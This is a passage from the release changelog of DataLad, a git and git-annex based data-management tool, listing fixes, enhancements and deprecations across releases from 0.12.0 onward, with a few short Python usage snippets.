`GitRepo.get_content_info`, a helper that gets triggered by many\n commands, got faster by tweaking its `git ls-files` call. 
([#5067][])\n\n- [wtf][] now includes credentials-related information (e.g. active\n backends) in the its output. ([#4982][])\n\n- The `call_git*` methods of `GitRepo` now have a `read_only`\n parameter. Callers can set this to `True` to promise that the\n provided command does not write to the repository, bypassing the\n cost of some checks and locking. ([#5070][])\n\n- New `call_annex*` methods in the `AnnexRepo` class provide an\n interface for running git-annex commands similar to that of the\n `GitRepo.call_git*` methods. ([#5163][])\n\n- It's now possible to register a custom metadata indexer that is\n discovered by [search][] and used to generate an index. ([#4963][])\n\n- The `ConfigManager` methods `get`, `getbool`, `getfloat`, and\n `getint` now return a single value (with same precedence as `git\n config --get`) when there are multiple values for the same key (in\n the non-committed git configuration, if the key is present there, or\n in the dataset configuration). For `get`, the old behavior can be\n restored by specifying `get_all=True`. ([#4924][])\n\n- Command-line scripts are now defined via the `entry_points` argument\n of `setuptools.setup` instead of the `scripts` argument. ([#4695][])\n\n- Interactive use of `--help` on the command-line now invokes a pager\n on more systems and installation setups. ([#5344][])\n\n- The `datalad` special remote now tries to eliminate some unnecessary\n interactions with git-annex by being smarter about how it queries\n for URLs associated with a key. ([#4955][])\n\n- The `GitRepo` class now does a better job of handling bare\n repositories, a step towards bare repositories support in DataLad.\n ([#4911][])\n\n- More internal work to move the code base over to the new command\n runner. ([#4699][]) ([#4855][]) ([#4900][]) ([#4996][]) ([#5002][])\n ([#5141][]) ([#5142][]) ([#5229][])\n\n\n# 0.13.7 (January 04, 2021) -- .\n\n## Fixes\n\n- Cloning from a RIA store on the local file system initialized annex\n in the Git sibling of the RIA source, which is problematic because\n all annex-related functionality should go through the storage\n sibling. [clone][] now sets `remote.origin.annex-ignore` to `true`\n after cloning from RIA stores to prevent this. ([#5255][])\n\n- [create-sibling][] invoked `cp` in a way that was not compatible\n with macOS. ([#5269][])\n\n- Due to a bug in older Git versions (before 2.25), calling [status][]\n with a file under .git/ (e.g., `datalad status .git/config`)\n incorrectly reported the file as untracked. A workaround has been\n added. ([#5258][])\n\n- Update tests for compatibility with latest git-annex. ([#5254][])\n\n## Enhancements and new features\n\n- [copy-file][] now aborts if .git/ is in the target directory, adding\n to its existing .git/ safety checks. ([#5258][])\n\n\n# 0.13.6 (December 14, 2020) -- .\n\n## Fixes\n\n- An assortment of fixes for Windows compatibility. ([#5113][]) ([#5119][])\n ([#5125][]) ([#5127][]) ([#5136][]) ([#5201][]) ([#5200][]) ([#5214][])\n\n- Adding a subdataset on a system that defaults to using an adjusted\n branch (i.e. doesn't support symlinks) didn't properly set up the\n submodule URL if the source dataset was not in an adjusted state.\n ([#5127][])\n\n- [push][] failed to push to a remote that did not have an\n `annex-uuid` value in the local `.git/config`. ([#5148][])\n\n- The default renderer has been improved to avoid a spurious leading\n space, which led to the displayed path being incorrect in some\n cases. 
([#5121][])\n\n- [siblings][] showed an uninformative error message when asked to\n configure an unknown remote. ([#5146][])\n\n- [drop][] confusingly relayed a suggestion from `git annex drop` to\n use `--force`, an option that does not exist in `datalad drop`.\n ([#5194][])\n\n- [create-sibling-github][] no longer offers user/password\n authentication because it is no longer supported by GitHub.\n ([#5218][])\n\n- The internal command runner's handling of the event loop has been\n tweaked to hopefully fix issues with running DataLad from IPython.\n ([#5106][])\n\n- SSH cleanup wasn't reliably triggered by the ORA special remote on\n failure, leading to a stall with a particular version of git-annex,\n 8.20201103. (This is also resolved on git-annex's end as of\n 8.20201127.) ([#5151][])\n\n## Enhancements and new features\n\n- The credential helper no longer asks the user to repeat tokens or\n AWS keys. ([#5219][])\n\n- The new option `datalad.locations.sockets` controls where DataLad\n stores SSH sockets, allowing users to more easily work around file\n system and path length restrictions. ([#5238][])\n\n# 0.13.5 (October 30, 2020) -- .\n\n## Fixes\n\n- SSH connection handling has been reworked to fix cloning on Windows.\n A new configuration option, `datalad.ssh.multiplex-connections`,\n defaults to false on Windows. ([#5042][])\n\n- The ORA special remote and post-clone RIA configuration now provide\n authentication via DataLad's credential mechanism and better\n handling of HTTP status codes. ([#5025][]) ([#5026][])\n\n- By default, if a git executable is present in the same location as\n git-annex, DataLad modifies `PATH` when running git and git-annex so\n that the bundled git is used. This logic has been tightened to\n avoid unnecessarily adjusting the path, reducing the cases where the\n adjustment interferes with the local environment, such as special\n remotes in a virtual environment being masked by the system-wide\n variants. ([#5035][])\n\n- git-annex is now consistently invoked as \"git annex\" rather than\n \"git-annex\" to work around failures on Windows. ([#5001][])\n\n- [push][] called `git annex sync ...` on plain git repositories.\n ([#5051][])\n\n- [save][] in general doesn't support registering multiple levels of\n untracked subdatasets, but it can now properly register nested\n subdatasets when all of the subdataset paths are passed explicitly\n (e.g., `datalad save -d. sub-a sub-a/sub-b`). ([#5049][])\n\n- When called with `--sidecar` and `--explicit`, [run][] didn't save\n the sidecar. ([#5017][])\n\n- A couple of spots didn't properly quote format fields when combining\n substrings into a format string. ([#4957][])\n\n- The default credentials configured for `indi-s3` prevented anonymous\n access. ([#5045][])\n\n## Enhancements and new features\n\n- Messages about suppressed similar results are now rate limited to\n improve performance when there are many similar results coming\n through quickly. ([#5060][])\n\n- [create-sibling-github][] can now be told to replace an existing\n sibling by passing `--existing=replace`. ([#5008][])\n\n- Progress bars now react to changes in the terminal's width (requires\n tqdm 2.1 or later). ([#5057][])\n\n\n# 0.13.4 (October 6, 2020) -- .\n\n## Fixes\n\n- Ephemeral clones mishandled bare repositories. ([#4899][])\n\n- The post-clone logic for configuring RIA stores didn't consider\n `https://` URLs. ([#4977][])\n\n- DataLad custom remotes didn't escape newlines in messages sent to\n git-annex. 
([#4926][])\n\n- The datalad-archives special remote incorrectly treated file names\n as percent-encoded. ([#4953][])\n\n- The result handler didn't properly escape \"%\" when constructing its\n message template. ([#4953][])\n\n- In v0.13.0, the tailored rendering for specific subtypes of external\n command failures (e.g., \"out of space\" or \"remote not available\")\n was unintentionally switched to the default rendering. ([#4966][])\n\n- Various fixes and updates for the NDA authenticator. ([#4824][])\n\n- The helper for getting a versioned S3 URL did not support anonymous\n access or buckets with \".\" in their name. ([#4985][])\n\n- Several issues with the handling of S3 credentials and token\n expiration have been addressed. ([#4927][]) ([#4931][]) ([#4952][])\n\n## Enhancements and new features\n\n- A warning is now given if the detected Git is below v2.13.0 to let\n users that run into problems know that their Git version is likely\n the culprit. ([#4866][])\n\n- A fix to [push][] in v0.13.2 introduced a regression that surfaces\n when `push.default` is configured to \"matching\" and prevents the\n git-annex branch from being pushed. Note that, as part of the fix,\n the current branch is now always pushed even when it wouldn't be\n based on the configured refspec or `push.default` value. ([#4896][])\n\n- [publish][]\n - now allows spelling the empty string value of `--since=` as `^`\n for consistency with [push][]. ([#4683][])\n - compares a revision given to `--since=` with `HEAD` rather than\n the working tree to speed up the operation. ([#4448][])\n\n- [rerun][]\n - emits more INFO-level log messages. ([#4764][])\n - provides better handling of adjusted branches and aborts with a\n clear error for cases that are not supported. ([#5328][])\n\n- The archives are handled with p7zip, if available, since DataLad\n v0.12.0. This implementation now supports .tgz and .tbz2 archives.\n ([#4877][])\n\n\n# 0.13.3 (August 28, 2020) -- .\n\n## Fixes\n\n- Work around a Python bug that led to our asyncio-based command\n runner intermittently failing to capture the output of commands that\n exit very quickly. ([#4835][])\n\n- [push][] displayed an overestimate of the transfer size when\n multiple files pointed to the same key. ([#4821][])\n\n- When [download-url][] calls `git annex addurl`, it catches and\n reports any failures rather than crashing. A change in v0.12.0\n broke this handling in a particular case. ([#4817][])\n\n## Enhancements and new features\n\n- The wrapper functions returned by decorators are now given more\n meaningful names to hopefully make tracebacks easier to digest.\n ([#4834][])\n\n\n# 0.13.2 (August 10, 2020) -- .\n\n## Deprecations\n\n- The `allow_quick` parameter of `AnnexRepo.file_has_content` and\n `AnnexRepo.is_under_annex` is now ignored and will be removed in a\n later release. This parameter was only relevant for git-annex\n versions before 7.20190912. ([#4736][])\n\n## Fixes\n\n- Updates for compatibility with recent git and git-annex releases.\n ([#4746][]) ([#4760][]) ([#4684][])\n\n- [push][] didn't sync the git-annex branch when `--data=nothing` was\n specified. ([#4786][])\n\n- The `datalad.clone.reckless` configuration wasn't stored in\n non-annex datasets, preventing the values from being inherited by\n annex subdatasets. 
([#4749][])\n\n- Running the post-update hook installed by `create-sibling --ui`\n could overwrite web log files from previous runs in the unlikely\n event that the hook was executed multiple times in the same second.\n ([#4745][])\n\n- [clone][] inspected git's standard error in a way that could cause\n an attribute error. ([#4775][])\n\n- When cloning a repository whose `HEAD` points to a branch without\n commits, [clone][] tries to find a more useful branch to check out.\n It unwisely considered adjusted branches. ([#4792][])\n\n- Since v0.12.0, `SSHManager.close` hasn't closed connections when the\n `ctrl_path` argument was explicitly given. ([#4757][])\n\n- When working in a dataset in which `git annex init` had not yet been\n called, the `file_has_content` and `is_under_annex` methods of\n `AnnexRepo` incorrectly took the \"allow quick\" code path on file\n systems that did not support it ([#4736][])\n\n## Enhancements\n\n- [create][] now assigns version 4 (random) UUIDs instead of version 1\n UUIDs that encode the time and hardware address. ([#4790][])\n\n- The documentation for [create][] now does a better job of describing\n the interaction between `--dataset` and `PATH`. ([#4763][])\n\n- The `format_commit` and `get_hexsha` methods of `GitRepo` have been\n sped up. ([#4807][]) ([#4806][])\n\n- A better error message is now shown when the `^` or `^.` shortcuts\n for `--dataset` do not resolve to a dataset. ([#4759][])\n\n- A more helpful error message is now shown if a caller tries to\n download an `ftp://` link but does not have `request_ftp` installed.\n ([#4788][])\n\n- [clone][] now tries harder to get up-to-date availability\n information after auto-enabling `type=git` special remotes. ([#2897][])\n\n\n# 0.13.1 (July 17, 2020) -- .\n\n## Fixes\n\n- Cloning a subdataset should inherit the parent's\n `datalad.clone.reckless` value, but that did not happen when cloning\n via `datalad get` rather than `datalad install` or `datalad clone`.\n ([#4657][])\n\n- The default result renderer crashed when the result did not have a\n `path` key. ([#4666][]) ([#4673][])\n\n- `datalad push` didn't show information about `git push` errors when\n the output was not in the format that it expected. ([#4674][])\n\n- `datalad push` silently accepted an empty string for `--since` even\n though it is an invalid value. ([#4682][])\n\n- Our JavaScript testing setup on Travis grew stale and has now been\n updated. (Thanks to Xiao Gui.) ([#4687][])\n\n- The new class for running Git commands (added in v0.13.0) ignored\n any changes to the process environment that occurred after\n instantiation. ([#4703][])\n\n## Enhancements and new features\n\n- `datalad push` now avoids unnecessary `git push` dry runs and pushes\n all refspecs with a single `git push` call rather than invoking `git\n push` for each one. ([#4692][]) ([#4675][])\n\n- The readability of SSH error messages has been improved. ([#4729][])\n\n- `datalad.support.annexrepo` avoids calling\n `datalad.utils.get_linux_distribution` at import time and caches the\n result once it is called because, as of Python 3.8, the function\n uses `distro` underneath, adding noticeable overhead. 
([#4696][])\n\n Third-party code should be updated to use `get_linux_distribution`\n directly in the unlikely event that the code relied on the\n import-time call to `get_linux_distribution` setting the\n `linux_distribution_name`, `linux_distribution_release`, or\n `on_debian_wheezy` attributes in `datalad.utils.\n\n\n# 0.13.0 (June 23, 2020) -- .\n\nA handful of new commands, including `copy-file`, `push`, and\n`create-sibling-ria`, along with various fixes and enhancements\n\n## Major refactoring and deprecations\n\n- The `no_annex` parameter of [create][], which is exposed in the\n Python API but not the command line, is deprecated and will be\n removed in a later release. Use the new `annex` argument instead,\n flipping the value. Command-line callers that use `--no-annex` are\n unaffected. ([#4321][])\n\n- `datalad add`, which was deprecated in 0.12.0, has been removed.\n ([#4158][]) ([#4319][])\n\n- The following `GitRepo` and `AnnexRepo` methods have been removed:\n `get_changed_files`, `get_missing_files`, and `get_deleted_files`.\n ([#4169][]) ([#4158][])\n\n- The `get_branch_commits` method of `GitRepo` and `AnnexRepo` has\n been renamed to `get_branch_commits_`. ([#3834][])\n\n- The custom `commit` method of `AnnexRepo` has been removed, and\n `AnnexRepo.commit` now resolves to the parent method,\n `GitRepo.commit`. ([#4168][])\n\n- GitPython's `git.repo.base.Repo` class is no longer available via\n the `.repo` attribute of `GitRepo` and `AnnexRepo`. ([#4172][])\n\n- `AnnexRepo.get_corresponding_branch` now returns `None` rather than\n the current branch name when a managed branch is not checked out.\n ([#4274][])\n\n- The special UUID for git-annex web remotes is now available as\n `datalad.consts.WEB_SPECIAL_REMOTE_UUID`. It remains accessible as\n `AnnexRepo.WEB_UUID` for compatibility, but new code should use\n `consts.WEB_SPECIAL_REMOTE_UUID` ([#4460][]).\n\n## Fixes\n\n- Widespread improvements in functionality and test coverage on\n Windows and crippled file systems in general. ([#4057][])\n ([#4245][]) ([#4268][]) ([#4276][]) ([#4291][]) ([#4296][])\n ([#4301][]) ([#4303][]) ([#4304][]) ([#4305][]) ([#4306][])\n\n- `AnnexRepo.get_size_from_key` incorrectly handled file chunks.\n ([#4081][])\n\n- [create-sibling][] would too readily clobber existing paths when\n called with `--existing=replace`. It now gets confirmation from the\n user before doing so if running interactively and unconditionally\n aborts when running non-interactively. ([#4147][])\n\n- [update][] ([#4159][])\n - queried the incorrect branch configuration when updating non-annex\n repositories.\n - didn't account for the fact that the local repository can be\n configured as the upstream \"remote\" for a branch.\n\n- When the caller included `--bare` as a `git init` option, [create][]\n crashed creating the bare repository, which is currently\n unsupported, rather than aborting with an informative error message.\n ([#4065][])\n\n- The logic for automatically propagating the 'origin' remote when\n cloning a local source could unintentionally trigger a fetch of a\n non-local remote. ([#4196][])\n\n- All remaining `get_submodules()` call sites that relied on the\n temporary compatibility layer added in v0.12.0 have been updated.\n ([#4348][])\n\n- The custom result summary renderer for [get][], which was visible\n with `--output-format=tailored`, displayed incorrect and confusing\n information in some cases. The custom renderer has been removed\n entirely. 
([#4471][])\n\n- The documentation for the Python interface of a command listed an\n incorrect default when the command overrode the value of command\n parameters such as `result_renderer`. ([#4480][])\n\n## Enhancements and new features\n\n- The default result renderer learned to elide a chain of results\n after seeing ten consecutive results that it considers similar,\n which improves the display of actions that have many results (e.g.,\n saving hundreds of files). ([#4337][])\n\n- The default result renderer, in addition to \"tailored\" result\n renderer, now triggers the custom summary renderer, if any. ([#4338][])\n\n- The new command [create-sibling-ria][] provides support for creating\n a sibling in a [RIA store][handbook-scalable-datastore]. ([#4124][])\n\n- DataLad ships with a new special remote, git-annex-remote-ora, for\n interacting with [RIA stores][handbook-scalable-datastore] and a new\n command [export-archive-ora][] for exporting an archive from a local\n annex object store. ([#4260][]) ([#4203][])\n\n- The new command [push][] provides an alternative interface to\n [publish][] for pushing a dataset hierarchy to a sibling.\n ([#4206][]) ([#4581][]) ([#4617][]) ([#4620][])\n\n- The new command [copy-file][] copies files and associated\n availability information from one dataset to another. ([#4430][])\n\n- The command examples have been expanded and improved. ([#4091][])\n ([#4314][]) ([#4464][])\n\n- The tooling for linking to the [DataLad Handbook][handbook] from\n DataLad's documentation has been improved. ([#4046][])\n\n- The `--reckless` parameter of [clone][] and [install][] learned two\n new modes:\n - \"ephemeral\", where the .git/annex/ of the cloned repository is\n symlinked to the local source repository's. ([#4099][])\n - \"shared-{group|all|...}\" that can be used to set up datasets for\n collaborative write access. ([#4324][])\n\n- [clone][]\n - learned to handle dataset aliases in RIA stores when given a URL\n of the form `ria+<protocol>://<storelocation>#~<aliasname>`.\n ([#4459][])\n - now checks `datalad.get.subdataset-source-candidate-NAME` to see\n if `NAME` starts with three digits, which is taken as a \"cost\".\n Sources with lower costs will be tried first. ([#4619][])\n\n- [update][] ([#4167][])\n - learned to disallow non-fast-forward updates when `ff-only` is\n given to the `--merge` option.\n - gained a `--follow` option that controls how `--merge` behaves,\n adding support for merging in the revision that is registered in\n the parent dataset rather than merging in the configured branch\n from the sibling.\n - now provides a result record for merge events.\n\n- [create-sibling][] now supports local paths as targets in addition\n to SSH URLs. ([#4187][])\n\n- [siblings][] now\n - shows a warning if the caller requests to delete a sibling that\n does not exist. ([#4257][])\n - phrases its warning about non-annex repositories in a less\n alarming way. ([#4323][])\n\n- The rendering of command errors has been improved. ([#4157][])\n\n- [save][] now\n - displays a message to signal that the working tree is clean,\n making it more obvious that no results being rendered corresponds\n to a clean state. ([#4106][])\n - provides a stronger warning against using `--to-git`. ([#4290][])\n\n- [diff][] and [save][] learned about scenarios where they could avoid\n unnecessary and expensive work. 
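\n\nAs a small illustration of the new [push][] and [copy-file][] commands described above, a minimal Python sketch; the dataset path, sibling name, and file paths are hypothetical, and `copy-file`'s Python keyword arguments are assumed to mirror its command-line options:\n\n```python\nimport datalad.api as dl\n\nds = dl.Dataset('/tmp/myds')  # hypothetical, already existing dataset\n\n# Push the dataset and its subdatasets to an already configured sibling\nds.push(to='mysibling', recursive=True)\n\n# Copy a file together with its availability information into another dataset\ndl.copy_file('/tmp/myds/data.csv', target_dir='/tmp/otherds/inputs')\n```\n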
([#4526][]) ([#4544][]) ([#4549][])\n\n- Calling [diff][] without `--recursive` but with a path constraint\n within a subdataset (\"<subdataset>/<path>\") now traverses into the\n subdataset, as \"<subdataset>/\" would, restricting its report to\n \"<subdataset>/<path>\". ([#4235][])\n\n- New option `datalad.annex.retry` controls how many times git-annex\n will retry on a failed transfer. It defaults to 3 and can be set to\n 0 to restore the previous behavior. ([#4382][])\n\n- [wtf][] now warns when the specified dataset does not exist.\n ([#4331][])\n\n- The `repr` and `str` output of the dataset and repo classes got a\n facelift. ([#4420][]) ([#4435][]) ([#4439][])\n\n- The DataLad Singularity container now comes with p7zip-full.\n\n- DataLad emits a log message when the current working directory is\n resolved to a different location due to a symlink. This is now\n logged at the DEBUG rather than WARNING level, as it typically does\n not indicate a problem. ([#4426][])\n\n- DataLad now lets the caller know that `git annex init` is scanning\n for unlocked files, as this operation can be slow in some\n repositories. ([#4316][])\n\n- The `log_progress` helper learned how to set the starting point to a\n non-zero value and how to update the total of an existing progress\n bar, two features needed for planned improvements to how some\n commands display their progress. ([#4438][])\n\n- The `ExternalVersions` object, which is used to check versions of\n Python modules and external tools (e.g., git-annex), gained an `add`\n method that enables DataLad extensions and other third-party code to\n include other programs of interest. ([#4441][])\n\n- All of the remaining spots that use GitPython have been rewritten\n without it. Most notably, this includes rewrites of the `clone`,\n `fetch`, and `push` methods of `GitRepo`. ([#4080][]) ([#4087][])\n ([#4170][]) ([#4171][]) ([#4175][]) ([#4172][])\n\n- When `GitRepo.commit` splits its operation across multiple calls to\n avoid exceeding the maximum command line length, it now amends to\n initial commit rather than creating multiple commits. ([#4156][])\n\n- `GitRepo` gained a `get_corresponding_branch` method (which always\n returns None), allowing a caller to invoke the method without\n needing to check if the underlying repo class is `GitRepo` or\n `AnnexRepo`. ([#4274][])\n\n- A new helper function `datalad.core.local.repo.repo_from_path`\n returns a repo class for a specified path. ([#4273][])\n\n- New `AnnexRepo` method `localsync` performs a `git annex sync` that\n disables external interaction and is particularly useful for\n propagating changes on an adjusted branch back to the main branch.\n ([#4243][])\n\n\n# 0.12.7 (May 22, 2020) -- .\n\n## Fixes\n\n- Requesting tailored output (`--output=tailored`) from a command with\n a custom result summary renderer produced repeated output. ([#4463][])\n\n- A longstanding regression in argcomplete-based command-line\n completion for Bash has been fixed. You can enable completion by\n configuring a Bash startup file to run `eval\n \"$(register-python-argcomplete datalad)\"` or source DataLad's\n `tools/cmdline-completion`. The latter should work for Zsh as well.\n ([#4477][])\n\n- [publish][] didn't prevent `git-fetch` from recursing into\n submodules, leading to a failure when the registered submodule was\n not present locally and the submodule did not have a remote named\n 'origin'. 
([#4560][])\n\n- [addurls][] botched path handling when the file name format started\n with \"./\" and the call was made from a subdirectory of the dataset.\n ([#4504][])\n\n- Double dash options in manpages were unintentionally escaped.\n ([#4332][])\n\n- The check for HTTP authentication failures crashed in situations\n where content came in as bytes rather than unicode. ([#4543][])\n\n- A check in `AnnexRepo.whereis` could lead to a type error. ([#4552][])\n\n- When installing a dataset to obtain a subdataset, [get][]\n confusingly displayed a message that described the containing\n dataset as \"underneath\" the subdataset. ([#4456][])\n\n- A couple of Makefile rules didn't properly quote paths. ([#4481][])\n\n- With DueCredit support enabled (`DUECREDIT_ENABLE=1`), the query for\n metadata information could flood the output with warnings if\n datasets didn't have aggregated metadata. The warnings are now\n silenced, with the overall failure of a [metadata][] call logged at\n the debug level. ([#4568][])\n\n## Enhancements and new features\n\n- The resource identifier helper learned to recognize URLs with\n embedded Git transport information, such as\n gcrypt::https://example.com. ([#4529][])\n\n- When running non-interactively, a more informative error is now\n signaled when the UI backend, which cannot display a question, is\n asked to do so. ([#4553][])\n\n\n# 0.12.6 (April 23, 2020) -- .\n\n## Major refactoring and deprecations\n\n- The value of `datalad.support.annexrepo.N_AUTO_JOBS` is no longer\n considered. The variable will be removed in a later release.\n ([#4409][])\n\n## Fixes\n\n- Starting with v0.12.0, `datalad save` recorded the current branch of\n a parent dataset as the `branch` value in the .gitmodules entry for\n a subdataset. This behavior is problematic for a few reasons and\n has been reverted. ([#4375][])\n\n- The default for the `--jobs` option, \"auto\", instructed DataLad to\n pass a value to git-annex's `--jobs` equal to `min(8, max(3, <number\n of CPUs>))`, which could lead to issues due to the large number of\n child processes spawned and file descriptors opened. To avoid this\n behavior, `--jobs=auto` now results in git-annex being called with\n `--jobs=1` by default. Configure the new option\n `datalad.runtime.max-annex-jobs` to control the maximum value that\n will be considered when `--jobs='auto'` (a configuration sketch\n follows at the end of this release's notes). ([#4409][])\n\n- Various commands have been adjusted to better handle the case where\n a remote's HEAD ref points to an unborn branch. ([#4370][])\n\n- [search][] gives a more helpful message when the query is an invalid\n regular expression. ([#4398][])\n\n- The code for parsing Git configuration did not follow Git's behavior\n of accepting a key with no value as shorthand for key=true. ([#4421][])\n\n- `AnnexRepo.info` needed a compatibility update for a change in how\n git-annex reports file names. ([#4431][])\n\n- [create-sibling-github][] did not gracefully handle a token that did\n not have the necessary permissions. ([#4400][])\n\n## Enhancements and new features\n\n- [search][] learned to use the query as a regular expression that\n restricts the keys that are shown for `--show-keys short`. ([#4354][])\n\n- `datalad <subcommand>` learned to point to the [datalad-container][]\n extension when a subcommand from that extension is given but the\n extension is not installed.
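\n\nThe configuration sketch referenced in the `--jobs` fix above; the dataset path is hypothetical, and the ConfigManager-based `config.set` call is just one way to set the option (plain `git config` works as well):\n\n```python\nimport datalad.api as dl\n\nds = dl.Dataset('/tmp/myds')  # hypothetical, already existing dataset\n\n# Raise the ceiling that `--jobs=auto` may use for git-annex; without this,\n# 'auto' now translates into a single git-annex job.\nds.config.set('datalad.runtime.max-annex-jobs', '8', where='local')\n\n# Retrieval may then use up to the configured number of annex jobs\nds.get('.', recursive=True, jobs='auto')\n```\n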
([#4400][]) ([#4174][])\n\n\n# 0.12.5 (Apr 02, 2020) -- a small step for datalad ...\n\nFix some bugs and make the world an even better place.\n\n## Fixes\n\n- Our `log_progress` helper mishandled the initial display and step of\n the progress bar. ([#4326][])\n\n- `AnnexRepo.get_content_annexinfo` is designed to accept `init=None`,\n but passing that led to an error. ([#4330][])\n\n- Update a regular expression to handle an output change in Git\n v2.26.0. ([#4328][])\n\n- We now set `LC_MESSAGES` to 'C' while running git to avoid failures\n when parsing output that is marked for translation. ([#4342][])\n\n- The helper for decoding JSON streams loaded the last line of input\n without decoding it if the line didn't end with a new line, a\n regression introduced in the 0.12.0 release. ([#4361][])\n\n- The clone command failed to git-annex-init a fresh clone whenever\n it considered to add the origin of the origin as a remote. ([#4367][])\n\n\n# 0.12.4 (Mar 19, 2020) -- Windows?!\n\nThe main purpose of this release is to have one on PyPi that has no\nassociated wheel to enable a working installation on Windows ([#4315][]).\n\n## Fixes\n\n- The description of the `log.outputs` config switch did not keep up\n with code changes and incorrectly stated that the output would be\n logged at the DEBUG level; logging actually happens at a lower\n level. ([#4317][])\n\n# 0.12.3 (March 16, 2020) -- .\n\nUpdates for compatibility with the latest git-annex, along with a few\nmiscellaneous fixes\n\n## Major refactoring and deprecations\n\n- All spots that raised a `NoDatasetArgumentFound` exception now raise\n a `NoDatasetFound` exception to better reflect the situation: it is\n the _dataset_ rather than the _argument_ that is not found. For\n compatibility, the latter inherits from the former, but new code\n should prefer the latter. ([#4285][])\n\n## Fixes\n\n- Updates for compatibility with git-annex version 8.20200226. ([#4214][])\n\n- `datalad export-to-figshare` failed to export if the generated title\n was fewer than three characters. It now queries the caller for the\n title and guards against titles that are too short. ([#4140][])\n\n- Authentication was requested multiple times when git-annex launched\n parallel downloads from the `datalad` special remote. ([#4308][])\n\n- At verbose logging levels, DataLad requests that git-annex display\n debugging information too. Work around a bug in git-annex that\n prevented that from happening. ([#4212][])\n\n- The internal command runner looked in the wrong place for some\n configuration variables, including `datalad.log.outputs`, resulting\n in the default value always being used. ([#4194][])\n\n- [publish][] failed when trying to publish to a git-lfs special\n remote for the first time. ([#4200][])\n\n- `AnnexRepo.set_remote_url` is supposed to establish shared SSH\n connections but failed to do so. ([#4262][])\n\n## Enhancements and new features\n\n- The message provided when a command cannot determine what dataset to\n operate on has been improved. ([#4285][])\n\n- The \"aws-s3\" authentication type now allows specifying the host\n through \"aws-s3_host\", which was needed to work around an\n authorization error due to a longstanding upstream bug. 
([#4239][])\n\n- The xmp metadata extractor now recognizes \".wav\" files.\n\n\n# 0.12.2 (Jan 28, 2020) -- Smoothen the ride\n\nMostly a bugfix release with various robustifications, but also makes\nthe first step towards versioned dataset installation requests.\n\n## Major refactoring and deprecations\n\n- The minimum required version for GitPython is now 2.1.12. ([#4070][])\n\n## Fixes\n\n- The class for handling configuration values, `ConfigManager`,\n inappropriately considered the current working directory's dataset,\n if any, for both reading and writing when instantiated with\n `dataset=None`. This misbehavior is fairly inaccessible through\n typical use of DataLad. It affects `datalad.cfg`, the top-level\n configuration instance that should not consider repository-specific\n values. It also affects Python users that call `Dataset` with a\n path that does not yet exist and persists until that dataset is\n created. ([#4078][])\n\n- [update][] saved the dataset when called with `--merge`, which is\n unnecessary and risks committing unrelated changes. ([#3996][])\n\n- Confusing and irrelevant information about Python defaults have been\n dropped from the command-line help. ([#4002][])\n\n- The logic for automatically propagating the 'origin' remote when\n cloning a local source didn't properly account for relative paths.\n ([#4045][])\n\n- Various fixes to file name handling and quoting on Windows.\n ([#4049][]) ([#4050][])\n\n- When cloning failed, error lines were not bubbled up to the user in\n some scenarios. ([#4060][])\n\n## Enhancements and new features\n\n- [clone][] (and thus [install][])\n - now propagates the `reckless` mode from the superdataset when\n cloning a dataset into it. ([#4037][])\n - gained support for `ria+<protocol>://` URLs that point to\n [RIA][handbook-scalable-datastore] stores. ([#4022][])\n - learned to read \"@version\" from `ria+` URLs and install that\n version of a dataset ([#4036][]) and to apply URL rewrites\n configured through Git's `url.*.insteadOf` mechanism ([#4064][]).\n - now copies `datalad.get.subdataset-source-candidate-<name>`\n options configured within the superdataset into the subdataset.\n This is particularly useful for RIA data stores. ([#4073][])\n\n- Archives are now (optionally) handled with 7-Zip instead of\n `patool`. 7-Zip will be used by default, but `patool` will be used\n on non-Windows systems if the `datalad.runtime.use-patool` option is\n set or the `7z` executable is not found. ([#4041][])\n\n\n# 0.12.1 (Jan 15, 2020) -- Small bump after big bang\n\nFix some fallout after major release.\n\n## Fixes\n\n- Revert incorrect relative path adjustment to URLs in [clone][]. ([#3538][])\n\n- Various small fixes to internal helpers and test to run on Windows\n ([#2566][]) ([#2534][])\n\n# 0.12.0 (Jan 11, 2020) -- Krakatoa\n\nThis release is the result of more than a year of development that includes\nfixes for a large number of issues, yielding more robust behavior across a\nwider range of use cases, and introduces major changes in API and behavior. It\nis the first release for which extensive user documentation is available in a\ndedicated [DataLad Handbook][handbook]. Python 3 (3.5 and later) is now the\nonly supported Python flavor.\n\n## Major changes 0.12 vs 0.11\n\n- [save][] fully replaces [add][] (which is obsolete now, and will be removed\n in a future release).\n\n- A new Git-annex aware [status][] command enables detailed inspection of dataset\n hierarchies. 
The previously available [diff][] command has been adjusted to\n match [status][] in argument semantics and behavior.\n\n- The ability to configure dataset procedures prior and after the execution of\n particular commands has been replaced by a flexible \"hook\" mechanism that is able\n to run arbitrary DataLad commands whenever command results are detected that match\n a specification.\n\n- Support of the Windows platform has been improved substantially. While performance\n and feature coverage on Windows still falls behind Unix-like systems, typical data\n consumer use cases, and standard dataset operations, such as [create][] and [save][],\n are now working. Basic support for data provenance capture via [run][] is also\n functional.\n\n- Support for Git-annex direct mode repositories has been removed, following the\n end of support in Git-annex itself.\n\n- The semantics of relative paths in command line arguments have changed. Previously,\n a call `datalad save --dataset /tmp/myds some/relpath` would have been interpreted\n as saving a file at `/tmp/myds/some/relpath` into dataset `/tmp/myds`. This has\n changed to saving `$PWD/some/relpath` into dataset `/tmp/myds`. More generally,\n relative paths are now always treated as relative to the current working directory,\n except for path arguments of [Dataset][] class instance methods of the Python API.\n The resulting partial duplication of path specifications between path and dataset\n arguments is mitigated by the introduction of two special symbols that can be given\n as dataset argument: `^` and `^.`, which identify the topmost superdataset and the\n closest dataset that contains the working directory, respectively.\n\n- The concept of a \"core API\" has been introduced. Commands situated in the module\n `datalad.core` (such as [create][], [save][], [run][], [status][], [diff][])\n receive additional scrutiny regarding API and implementation, and are\n meant to provide longer-term stability. Application developers are encouraged to\n preferentially build on these commands.\n\n## Major refactoring and deprecations since 0.12.0rc6\n\n- [clone][] has been incorporated into the growing core API. The public\n `--alternative-source` parameter has been removed, and a `clone_dataset`\n function with multi-source capabilities is provided instead. The\n `--reckless` parameter can now take literal mode labels instead of just\n being a binary flag, but backwards compatibility is maintained.\n\n- The `get_file_content` method of `GitRepo` was no longer used\n internally or in any known DataLad extensions and has been removed.\n ([#3812][])\n\n- The function `get_dataset_root` has been replaced by\n `rev_get_dataset_root`. `rev_get_dataset_root` remains as a\n compatibility alias and will be removed in a later release. ([#3815][])\n\n- The `add_sibling` module, marked obsolete in v0.6.0, has been\n removed. ([#3871][])\n\n- `mock` is no longer declared as an external dependency because we\n can rely on it being in the standard library now that our minimum\n required Python version is 3.5. ([#3860][])\n\n- [download-url][] now requires that directories be 